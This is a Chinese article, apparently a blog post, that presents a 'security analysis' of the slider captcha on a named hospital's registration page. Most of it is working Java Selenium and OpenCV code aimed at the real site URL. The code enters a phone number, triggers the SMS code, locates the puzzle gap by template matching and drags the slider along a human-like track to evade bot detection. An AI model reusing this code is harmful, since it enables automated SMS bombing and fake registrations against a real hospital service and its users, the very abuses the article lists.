前言
由于网站注册入口容易被黑客攻击,存在如下安全问题:
- 暴力破解密码,造成用户信息泄露
- 短信盗刷的安全问题,影响业务及导致用户投诉
- 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞
所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析
一、 福建医科大学附属第一医院PC 注册入口
简介:福建医科大学附属第一医院(以下简称“医院”)创建于1937年,是福建省首家公立西医医院。历经抗战的硝烟,告别动荡的岁月,百折不挠的附一人秉承“践行立德树人,守护生命安全,推动医学进步,促进人民健康”的使命,将医院建设成为福建省集医疗、教学、科研于一体的大型综合性三级甲等医院。医院综合实力雄厚,是福建省高水平医院,并被国家发改委、国家卫健委确定为首批全国疑难病症诊治能力提升工程项目医院和中国罕见病协作网福建省牵头单位。在国家卫健委公布的三级公立医院绩效考核中,连续5年荣获A+,分别位居全国第37名、第44名、第42名、第42名、第32名。医院荣登2023年研究型医院排行榜全国第33名,在2024年Nature发布的自然指数榜单中,位列全球医疗机构第284位,居福建省第一。与复旦大学附属华山医院共建的复旦大学附属华山医院福建医院(福建医科大学附属第一医院滨海院区)为全国首批10家国家区域医疗中心。
1. 注册引导页
2. 会员注册页面
二、 安全性分析报告:
福建医科大学附属第一医院采用的是自己研发的滑动验证码,容易被模拟器绕过甚至逆向后暴力攻击,滑动拼图识别率在 95% 以上。
三、 测试方法:
前端界面分析,这是福建医科大学附属第一医院自己研发的滑动验证码,网上没有现成的教学视频,但形式都差不多,没什么难度 , 这次还是采用模拟器的方式,关键点主要模拟器交互、距离识别和轨道算法3部分 。
- 模拟器交互部分
private static String INDEX_URL = "https://jk.fyyy.com:10081/module/backstage/pcweb/#/login";
@Override
public RetEntity send(WebDriver driver, String areaCode, String phone) {
try {
RetEntity retEntity = new RetEntity();
driver.get(INDEX_URL);
WebElement tabElement = ChromeDriverManager.waitElement(driver, By.xpath("//div/span[contains(text(),'暂无账号?点击注册')]"), 20);
tabElement.click();
// 输入手机号
Thread.sleep(1000);
WebElement phoneElement = driver.findElement(By.xpath("//input[contains(@placeholder,'请输入手机号码')]"));
phoneElement.sendKeys(phone);
// 密码
Thread.sleep(1000);
WebElement passElement = driver.findElement(By.xpath("//input[contains(@placeholder,'设置密码')]"));
passElement.sendKeys("Abc123456");
WebElement passConfirmElement = driver.findElement(By.xpath("//input[contains(@placeholder,'确认密码')]"));
passConfirmElement.sendKeys("Abc123456");
Thread.sleep(500);
List<WebElement> findElements = driver.findElements(By.xpath("//button/span"));
WebElement sendElement = null;
for (WebElement web : findElements) {
String text = web.getText();
if (text != null && text.contains("获取验证码")) {
web.click();
sendElement = web;
break;
}
}
Thread.sleep(2000);
WebElement moveElemet = ChromeDriverManager.waitElement(driver, By.id("slider-move-btn"), 20);
// 1 获取带阴影的背景图
byte[] bigBytes = GetImage.callJsById(driver, "bg-img");
// 2 获取小图
byte[] smallBytes = GetImage.callJsById(driver, "slider-img");
// 3 计算匹配到的位置
String ckSum = GenChecksumUtil.genChecksum(bigBytes);
Map<String, Double> openResult = cv2.getOpenCvDistance(ckSum, bigBytes, smallBytes, "Fyyy", 0);
if (openResult == null || openResult.size() < 2) {
System.out.println("ckSum=" + ckSum + "->openResult=" + openResult);
return null;
}
Double r = 260.0 / 590.0;
BigDecimal disD = new BigDecimal(openResult.get("minX") * r).setScale(0, BigDecimal.ROUND_HALF_UP);
int distance = disD.intValue();
// 4 滑动
ActionMove.move(driver, moveElemet, distance);
Thread.sleep(2000);
String msg = (sendElement != null) ? sendElement.getText() : null;
retEntity.setMsg(msg);
if (msg != null && msg.contains("后重新获取")) {
retEntity.setRet(0);
}
return retEntity;
} catch (Exception e) {
System.out.println("phone=" + phone + ",e=" + e.toString());
for (StackTraceElement ele : e.getStackTrace()) {
System.out.println(ele.toString());
}
return null;
} finally {
driver.manage().deleteAllCookies();
}
}
2. 距离识别
/**
*
* @param ckSum
* @param bigBytes
* @param smallBytes
* @param factory
* @return { width, maxX }
*/
public String[] getOpenCvDistance(String ckSum, byte bigBytes[], byte smallBytes[], String factory, int border) {
try {
String basePath = ConstTable.codePath + factory + "/";
File baseFile = new File(basePath);
if (!baseFile.isDirectory()) {
baseFile.mkdirs();
}
// 小图文件
File smallFile = new File(basePath + ckSum + "_s.png");
FileUtils.writeByteArrayToFile(smallFile, smallBytes);
// 大图文件
File bigFile = new File(basePath + ckSum + "_b.png");
FileUtils.writeByteArrayToFile(bigFile, bigBytes);
// 边框清理(去干扰)
byte[] clearBoder = (border > 0) ? ImageIOHelper.clearBoder(smallBytes, border) : smallBytes;
File tpFile = new File(basePath + ckSum + "_t.png");
FileUtils.writeByteArrayToFile(tpFile, clearBoder);
String resultFile = basePath + ckSum + "_o.png";
return getWidth(tpFile.getAbsolutePath(), bigFile.getAbsolutePath(), resultFile);
} catch (Throwable e) {
logger.error("getMoveDistance() ckSum=" + ckSum + " " + e.toString());
for (StackTraceElement elment : e.getStackTrace()) {
logger.error(elment.toString());
}
return null;
}
}
/**
* Open Cv 图片模板匹配
*
* @param tpPath
* 模板图片路径
* @param bgPath
* 目标图片路径
* @return { width, maxX }
*/
private String[] getWidth(String tpPath, String bgPath, String resultFile) {
try {
Rect rectCrop = clearWhite(tpPath);
Mat g_tem = Imgcodecs.imread(tpPath);
Mat clearMat = g_tem.submat(rectCrop);
Mat cvt = new Mat();
Imgproc.cvtColor(clearMat, cvt, Imgproc.COLOR_RGB2GRAY);
Mat edgesSlide = new Mat();
Imgproc.Canny(cvt, edgesSlide, threshold1, threshold2);
Mat cvtSlide = new Mat();
Imgproc.cvtColor(edgesSlide, cvtSlide, Imgproc.COLOR_GRAY2RGB);
Imgcodecs.imwrite(tpPath, cvtSlide);
Mat g_b = Imgcodecs.imread(bgPath);
Mat edgesBg = new Mat();
Imgproc.Canny(g_b, edgesBg, threshold1, threshold2);
Mat cvtBg = new Mat();
Imgproc.cvtColor(edgesBg, cvtBg, Imgproc.COLOR_GRAY2RGB);
int result_rows = cvtBg.rows() - cvtSlide.rows() + 1;
int result_cols = cvtBg.cols() - cvtSlide.cols() + 1;
Mat g_result = new Mat(result_rows, result_cols, CvType.CV_32FC1);
Imgproc.matchTemplate(cvtBg, cvtSlide, g_result, Imgproc.TM_CCOEFF_NORMED); // 归一化平方差匹配法
// 归一化相关匹配法
MinMaxLocResult minMaxLoc = Core.minMaxLoc(g_result);
Point maxLoc = minMaxLoc.maxLoc;
Imgproc.rectangle(cvtBg, maxLoc, new Point(maxLoc.x + cvtSlide.cols(), maxLoc.y + cvtSlide.rows()), new Scalar(0, 0, 255), 1);
Imgcodecs.imwrite(resultFile, cvtBg);
String width = String.valueOf(cvtSlide.cols());
String maxX = String.valueOf(maxLoc.x + cvtSlide.cols());
System.out.println("OpenCv2.getWidth() width=" + width + ",maxX=" + maxX);
return new String[] { width, maxX };
} catch (Throwable e) {
System.out.println("getWidth() " + e.toString());
logger.error("getWidth() " + e.toString());
for (StackTraceElement elment : e.getStackTrace()) {
logger.error(elment.toString());
}
return null;
}
}
public Rect clearWhite(String smallPath) {
try {
Mat matrix = Imgcodecs.imread(smallPath);
int rows = matrix.rows();// height -> y
int cols = matrix.cols();// width -> x
System.out.println("OpenCv2.clearWhite() rows=" + rows + ",cols=" + cols);
Double rgb;
double[] arr;
int minX = 255;
int minY = 255;
int maxX = 0;
int maxY = 0;
Color c;
for (int x = 0; x < cols; x++) {
for (int y = 0; y < rows; y++) {
arr = matrix.get(y, x);
rgb = 0.00;
for (int i = 0; i < 3; i++) {
rgb += arr[i];
}
c = new Color(rgb.intValue());
int b = c.getBlue();
int r = c.getRed();
int g = c.getGreen();
int sum = r + g + b;
if (sum >= 5) {
if (x <= minX)
minX = x;
else if (x >= maxX)
maxX = x;
if (y <= minY)
minY = y;
else if (y >= maxY)
maxY = y;
}
}
}
int boder = 1;
if (boder > 0) {
minX = (minX > boder) ? minX - boder : 0;
maxX = (maxX + boder < cols) ? maxX + boder : cols;
minY = (minY > boder) ? minY - boder : 0;
maxY = (maxY + boder < rows) ? maxY + boder : rows;
}
int width = (maxX - minX);
int height = (maxY - minY);
System.out.println("openCv2 minX=" + minX + ",minY=" + minY + ",maxX=" + maxX + ",maxY=" + maxY + "->width=" + width + ",height=" + height);
Rect rectCrop = new Rect(minX, minY, width, height);
return rectCrop;
} catch (Throwable e) {
StringBuffer er = new StringBuffer("clearWrite() " + e.toString() + "\n");
for (StackTraceElement elment : e.getStackTrace()) {
er.append(elment.toString() + "\n");
}
logger.error(er.toString());
System.out.println(er.toString());
return null;
}
}
3. 轨道生成及移动算法
/**
* 双轴轨道生成算法,主要实现平滑加速和减速
*
* @param distance
* @return
*/
public static List<Integer[]> getXyTrack(int distance) {
List<Integer[]> track = new ArrayList<Integer[]>();// 移动轨迹
try {
int a = (int) (distance / 3.0) + random.nextInt(10);
int h = 0, current = 0;// 已经移动的距离
BigDecimal midRate = new BigDecimal(0.7 + (random.nextInt(10) / 100.00)).setScale(4, BigDecimal.ROUND_HALF_UP);
BigDecimal mid = new BigDecimal(distance).multiply(midRate).setScale(0, BigDecimal.ROUND_HALF_UP);// 减速阈值
BigDecimal move = null;// 每次循环移动的距离
List<Integer[]> subList = new ArrayList<Integer[]>();// 移动轨迹
boolean plus = true;
Double t = 0.18, v = 0.00, v0;
while (current <= distance) {
h = random.nextInt(2);
if (current > distance / 2) {
h = h * -1;
}
v0 = v;
v = v0 + a * t;
move = new BigDecimal(v0 * t + 1 / 2 * a * t * t).setScale(4, BigDecimal.ROUND_HALF_UP);// 加速
if (move.intValue() < 1)
move = new BigDecimal(1L);
if (plus) {
track.add(new Integer[] { move.intValue(), h });
} else {
subList.add(0, new Integer[] { move.intValue(), h });
}
current += move.intValue();
if (plus && current >= mid.intValue()) {
plus = false;
move = new BigDecimal(0L);
v = 0.00;
}
}
track.addAll(subList);
int bk = current - distance;
if (bk > 0) {
for (int i = 0; i < bk; i++) {
track.add(new Integer[] { -1, h });
}
}
System.out.println("getMoveTrack(" + midRate + ") a=" + a + ",distance=" + distance + " -> mid=" + mid.intValue() + " size=" + track.size());
return track;
} catch (Exception e) {
System.out.print(e.toString());
return null;
}
}
/**
* 模拟人工移动
*
* @param driver
* @param element页面滑块
* @param distance需要移动距离
* @throws InterruptedException
*/
public static void move(WebDriver driver, WebElement element, int distance) throws InterruptedException {
List<Integer[]> track = getXyTrack(distance);
if (track == null || track.size() < 1) {
System.out.println("move() track=" + track);
}
int moveY, moveX;
StringBuffer sb = new StringBuffer();
try {
Actions actions = new Actions(driver);
actions.clickAndHold(element).perform();
Thread.sleep(50);
long begin, cost;
Integer[] move;
int sum = 0;
for (int i = 0; i < track.size(); i++) {
begin = System.currentTimeMillis();
move = track.get(i);
moveX = move[0];
sum += moveX;
moveY = move[1];
if (moveX < 0) {
if (sb.length() > 0) {
sb.append(",");
}
sb.append(moveX);
}
actions.moveByOffset(moveX, moveY).perform();
cost = System.currentTimeMillis() - begin;
if (cost < 5) {
Thread.sleep(5 - cost);
}
}
if (sb.length() > 0) {
System.out.println("-----backspace[" + sb.toString() + "]sum=" + sum + ",distance=" + distance);
}
Thread.sleep(180);
actions.release(element).perform();
Thread.sleep(500);
} catch (Exception e) {
StringBuffer er = new StringBuffer("move() " + e.toString() + "\n");
for (StackTraceElement elment : e.getStackTrace())
er.append(elment.toString() + "\n");
logger.error(er.toString());
System.out.println(er.toString());
}
}
4. 图片比对结果测试样例:
四丶结语
福建医科大学附属第一医院(以下简称“医院”)创建于1937年,是福建省首家公立西医医院。历经抗战的硝烟,告别动荡的岁月,百折不挠的附一人秉承“践行立德树人,守护生命安全,推动医学进步,促进人民健康”的使命,将医院建设成为福建省集医疗、教学、科研于一体的大型综合性三级甲等医院。医院综合实力雄厚,是福建省高水平医院,并被国家发改委、国家卫健委确定为首批全国疑难病症诊治能力提升工程项目医院和中国罕见病协作网福建省牵头单位。与复旦大学附属华山医院共建的复旦大学附属华山医院福建医院(福建医科大学附属第一医院滨海院区)为全国首批10家国家区域医疗中心。医院作为涉及民生的重点事业单位,技术实力较弱采取采购产品的方式,采购了一家智业健康的软件产品,这家公司研发的滑动验证产品, 在一定程度上提高了用户体验, 不过随着图形识别技术及机器学习能力的提升,所以在网上破解的文章和教学视频也是大量存在,并且经过验证的确有效, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。
很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
所以大家在安全方面还是要重视。(血淋淋的栗子!)#安全短信#
谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?
>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象区域面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《使用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的训练部署套件》